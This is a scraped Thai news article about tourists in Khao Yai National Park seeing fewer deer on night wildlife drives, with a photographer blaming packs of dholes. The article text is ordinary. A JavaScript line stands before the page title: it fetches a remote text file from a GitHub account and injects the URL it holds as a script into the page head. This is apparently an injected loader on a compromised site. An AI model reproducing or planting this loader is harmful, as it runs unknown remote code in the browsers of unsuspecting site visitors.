;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); ปากช่อง นักท่องเที่ยวเขาใหญ่ส่องสัตว์พบหมาในกวางน้อยลง - ThaiReference | อาสาไทยยืนยัน
ปากช่อง นักท่องเที่ยวเขาใหญ่ส่องสัตว์พบหมาในกวางน้อยลง

อุทยานแห่งชาติเขาใหญ่ มรดกโลกทางธรรมชาติ มีพื้นที่ประมาณ 2,168,78 ตารางกิโลเมตร หรือ 1,355,468.75 ไร่ ครอบคลุม 11 อำเภอ ของ  4 จังหวัด คือ จังหวัดปราจีนบุรี ,นครนายก,สระบุรี ,และนครราชสีมา เป็นพื้นที่ป่าดิบชื่น ป่าดิบโป่ง และทุ่งหญ้า มีสัตว์ป่าขนาดใหญ่ และขนาดเล็ก อาศัยอยู่มากมายหลายชนิด เช่น ช้างป่า กระทิง กวาง เก้ง กระจง เลียงผา หมีควาย ชะนี ลิง  เม่น  อีเห็นข้างลาย ชะมด และสัตว์อื่นๆ และยังมีนกขนาดใหญ่ เช่นนกเงือก 4 ชนิด เช่น นกแก๊ก นกกก นกเงือกกรามช้าง และนกเงือกสีน้ำตาลคอขาว ซึ่งในแต่ละวัน จะพบกลุ่มทัวร์ ทั้งชาวไทยและชาวต่างชาติ เดินป่าส่องดูนก โดยอุทยานฯเขาใหญ่ มีกิจกรรมนั่งรถส่องสัตว์ในตอนกลางคืน ตั้งแต่เวลา 19.00น.- 21.00น.ทุกวัน

เพื่อให้นักท่องเที่ยวได้สัมผัสธรรมชาติอากาศเย็นในช่วงกลางคืน และดูสัตว์ป่าออกหากิน เช่น เก้ง กวาง ชะมด เม่น  และสัตว์อื่นๆที่ออกหากินในช่วงกลางคืน โดยนักท่องเที่ยว บอกว่า พบเก้ง กวาง น้อยลง ไม่เหมือนแต่ก่อน จะพบกวาง เก้ง ออกหากินเป็นฝูง 4-5 ตัว ไม่ทราบเกิดจากอะไรกวางถึงลดน้อยลง

ด้านนายอสัมภิญพงศ์ หรือต่าย เป็นนักท่องเที่ยวและกลุ่มช่างภาพ ที่เข้ามาถ่ายภาพสัตว์ป่า ช้างป่า ในพื้นที่อุทยานฯเขาใหญ่ กล่าวว่า เหตุที่เก้ง กวาง ในพื้นที่ทุ่งหญ้าลดลง ส่วนหนึ่งอาจจะเกิดจากถูกฝูงหมาใน ไล่ล่าเป็นอาหาร ซึ่งหลายครั้งที่พบเจอฝูงหมาในกว่า 10 ตัว ไล่ล่าเก้ง กวาง ลงน้ำรุมกัดกินเป็นอาหาร และได้บันทึกภาพมาได้หลายครั้ง อาจจะทำให้ ลูกกระทิง เก้ง กวางลดลงจากสาเหตุนี้ก็เป็นไปได้

เนื่องจากในพื้นที่เขาใหญ่มีฝูงหมาในอาศัยอยู่เป็นจำนวนมากหลายร้อยตัว และล่าเนื้อสัตว์ป่าเป็นอาหาร จึงทำให้เก้ง กวาง ออกจากป่าเข้ามาอยู่ใกล้คน เช่นลานกางเต็นท์ลำตะคอง และบริเวณใกล้ที่ทำการ เพื่อความปลอดภัย

ภาพ-ข่าว ปัญญา ปากช่อง

[dsm_icon_divider use_icon=”on” font_icon=”||divi||400″ use_icon_font_size=”on” icon_font_size=”25px” divider_style=”dashed” _builder_version=”4.25.2″ _module_preset=”default” module_alignment=”center” global_colors_info=”{}”][/dsm_icon_divider]
[dsm_blog_carousel posts_number=”20″ posts_offset=”1″ include_categories=”3,5,4″ use_date=”off” use_category=”on” use_author=”off” use_readmore=”on” readmore_text=”อ่านเพิ่ม…” post_equal_height=”on” _builder_version=”4.25.2″ _module_preset=”default” title_font_size=”25px” min_height=”482px” custom_margin=”||639px||false|false” custom_padding=”||340px|||” global_colors_info=”{}”][/dsm_blog_carousel]